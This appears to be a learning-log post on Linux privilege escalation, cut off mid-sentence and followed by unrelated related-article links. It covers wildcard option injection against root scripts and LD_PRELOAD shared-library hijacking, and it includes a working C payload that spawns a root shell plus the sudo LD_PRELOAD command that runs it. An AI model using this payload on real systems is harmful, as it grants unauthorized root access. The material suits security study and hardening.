Day 18: The Danger of Wildcards (*) & Library Injection 🕵️‍♂️

🛠️ The "Option Injection" Breakdown 1. When Filenames become Commands When a script runs rsync -av * /backup/ , the shell expands the * into a list of all files in the directory. If an attacker creates a file named -e , rsync interprets it as an option , not a file. The Exploit: Using -e or --checkpoint-action to force the program to execute a malicious script as root. The Fix: Never use naked wildcards in root scripts. Always use absolute paths or the -- separator to signal the end of command options. 2. Hijacking the Dynamic Linker ( LD_PRELOAD ) I practiced forcing a program to load a malicious .so (shared object) file before its legitimate libraries. By defining a void _init() function in C, I can execute code the moment the library is loaded. // root.c void _init () { setuid ( 0 ); system ( "/bin/bash" ); } Execution: sudo LD_PRELOAD=/tmp/root.so 3. Library Search Order Understanding how the loader finds libraries is key to Shared Library Hijacking. The typical order is: RPATH / R

Day 18: The Danger of Wildcards (*) & Library Injection 🕵️‍♂️

Related Articles

What You Need to Know About Building an Outdoor Sauna (2026)

The Boring Skills That Make Developers Unstoppable in 2026

I Installed This VS Code Extension… and My Code Got Instantly Better

The Age of Personalized Software

Automating Checkout Add-On Recommendations in WordPress for WooCommerce

Related Articles

How-To
What You Need to Know About Building an Outdoor Sauna (2026)
Wired • 14h ago

How-To
The Boring Skills That Make Developers Unstoppable in 2026
Medium Programming • 19h ago

How-To
I Installed This VS Code Extension… and My Code Got Instantly Better
Medium Programming • 20h ago

How-To
The Age of Personalized Software
Medium Programming • 22h ago

How-To
Automating Checkout Add-On Recommendations in WordPress for WooCommerce
Dev.to • 22h ago